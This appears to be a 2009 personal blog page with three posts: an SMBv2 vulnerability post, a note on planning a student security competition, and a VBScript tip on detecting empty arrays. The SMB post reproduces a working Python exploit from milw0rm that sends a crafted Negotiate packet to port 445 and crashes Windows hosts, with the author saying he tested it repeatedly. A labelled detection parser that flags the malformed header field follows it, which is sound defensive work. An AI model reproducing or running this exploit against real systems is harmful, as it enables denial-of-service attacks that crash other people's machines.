Sep/090
Microsoft SMB2 Vulnerability update.
Microsoft has released a news update with links to a "Microsoft Fix It" package that will disable SMBv2 until a proper patch is released. Check out http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx to read.
For those of you who do not know what I'm talking about: by sending a specially crafted packet, an attacker can exploit a bug in SMBv2 (the protocol that Microsoft File and Print Sharing relies on) and cause a system to blue screen and reboot.
I have tested this myself and it has worked every time... sorry Chaim.
Below is the code that I have been using to actually exploit this vulnerability. Use with caution and don't be malicious. I take no responsibility for your shenanigans.
This code came from milw0rm.
#!/usr/bin/python
from socket import *
from time import sleep
hosty = "ip.of.target.machine"
print hosty
host = hosty, 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negotiate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26" # Process ID High: normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.settimeout(1)
s.connect(host)
s.send(buff)
s.close()
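An added detection-side example (not from the original post or from milw0rm): it parses a direct-TCP SMB1 Negotiate Protocol request and flags a non-zero Process ID High field, which the comment in the code above says should normally be "\x00\x00". The function name, the result keys and the two sample frames are constructed for illustration, and it is written for Python 3.

```python
import struct

SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
FLAGS_REPLY = 0x80  # set in server responses, clear in client requests


def inspect_negotiate(frame: bytes):
    """Return header facts for an SMB1 Negotiate request, or None for anything else."""
    if len(frame) < 4 + 35 or frame[0] != 0x00:      # 0x00 = session message
        return None
    length = int.from_bytes(frame[1:4], "big")       # 3-byte length prefix
    smb = frame[4:4 + length]
    if len(smb) < 35 or smb[:4] != SMB1_MAGIC or smb[4] != SMB_COM_NEGOTIATE:
        return None
    if smb[9] & FLAGS_REPLY:                          # only inspect requests
        return None
    (pid_high,) = struct.unpack_from("<H", smb, 12)  # Process ID High, offset 12
    off = 33 + 2 * smb[32]                            # skip word count + parameter words
    if off + 2 > len(smb):
        return None
    (byte_count,) = struct.unpack_from("<H", smb, off)
    data = smb[off + 2:off + 2 + byte_count]
    # Each dialect entry is 0x02 followed by a NUL-terminated ASCII name.
    dialects = [d[1:].decode("ascii", "replace")
                for d in data.split(b"\x00") if d.startswith(b"\x02")]
    return {
        "pid_high": pid_high,
        "dialects": dialects,
        "offers_smb2": any(d.startswith("SMB 2") for d in dialects),
        "suspicious": pid_high != 0,                  # normal clients send zero here
    }


# --- Constructed sample frames (test data, not captured traffic) ---
def _wrap(smb: bytes) -> bytes:
    return b"\x00" + len(smb).to_bytes(3, "big") + smb

def _body(dialect_bytes: bytes) -> bytes:
    return b"\x00" + len(dialect_bytes).to_bytes(2, "little") + dialect_bytes

_HEAD = SMB1_MAGIC + b"\x72" + bytes(4) + b"\x18" + bytes(2)  # cmd, status, flags, flags2
_TAIL = bytes(10) + b"\xff\xff\x01\x00" + bytes(4)  # signature, reserved, TID, PID, UID, MID
SAMPLE_NORMAL = _wrap(_HEAD + b"\x00\x00" + _TAIL
                      + _body(b"\x02NT LM 0.12\x00\x02SMB 2.002\x00"))
SAMPLE_ODD = _wrap(_HEAD + b"\x01\x00" + _TAIL + _body(b"\x02NT LM 0.12\x00"))

if __name__ == "__main__":
    for name, frame in (("normal", SAMPLE_NORMAL), ("odd", SAMPLE_ODD)):
        print(name, inspect_negotiate(frame))
```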
Sep/090
Some updates!
Hey everyone,
Just thought I would update everyone on the different projects I have been working on lately.
School has started again and I now have a week of grad school under the belt, nothing too hard or exciting with that.
I have, though, been working on redesigning and planning SPARSA's 7th Information Security Talent Search, which will be held in March 2010. The old ISTS that has occurred for the past 6 years has been scrapped and I have redesigned the entire competition to bring new challenges and excitement to an already awesome competition. This year will be the biggest and baddest ISTS yet. Once I finish rewriting the registration website, I will be opening up registration to everyone! Stay tuned for more information as more and more work gets finished up.
Stay tuned for more updates coming soon!
Sep/090
Detect empty arrays in VBScript
So for those of you who have tried to determine the size of an array in VBScript and have failed, this may be for you. I recently needed to be able to determine if an array was size 0 in VBScript and was running into some issues.
VBScript does not have a .SizeOf() function that you can execute on an array to determine its size. Normally what I would do in most other languages is something like the following:
if sizeof(array) = 0
{
//do something here
}
To accomplish this in VBScript you need to do the following.
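' IsNull matches a variable holding Null; UBound is -1 for a zero-length array
If IsNull(arr) Then
    ' Do something here
ElseIf UBound(arr) < 0 Then
    ' Do something here
End If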
Why can't you do things like the rest of the world, VBScript!!!!! That is all.